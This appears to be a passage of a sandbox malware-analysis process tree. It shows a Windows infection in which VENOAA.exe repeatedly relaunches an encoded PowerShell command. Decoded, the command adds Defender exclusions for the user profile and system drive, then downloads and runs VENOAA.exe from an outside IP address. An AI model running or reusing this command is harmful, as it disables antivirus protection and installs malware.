        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        264⤵
        
        PID:3076
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        265⤵
        
        PID:3316
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        265⤵
        
        PID:1832
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        266⤵
        
        PID:2908
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        267⤵
        
        PID:1348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        268⤵
        
        PID:4400
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        269⤵
        
        PID:4548
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        269⤵
        
        PID:916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        270⤵
        
        PID:1384
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        271⤵
        
        PID:3484
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        272⤵
        
        PID:760
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        273⤵
        
        PID:4476
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        274⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        275⤵
        
        PID:2496
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        276⤵
        
        PID:4068
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        277⤵
        
        PID:1772
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        278⤵
        
        PID:3640
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        279⤵
        
        PID:1972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        280⤵
        
        PID:992
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        281⤵
        
        PID:1940
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        282⤵
        
        PID:2608
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        283⤵
        
        PID:3560
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        284⤵
        
        PID:3840
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        285⤵
        
        PID:2192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        286⤵
        
        PID:2484
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        287⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        287⤵
        
        PID:3456
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        288⤵
        
        PID:2596
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        289⤵
        
        PID:3904
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
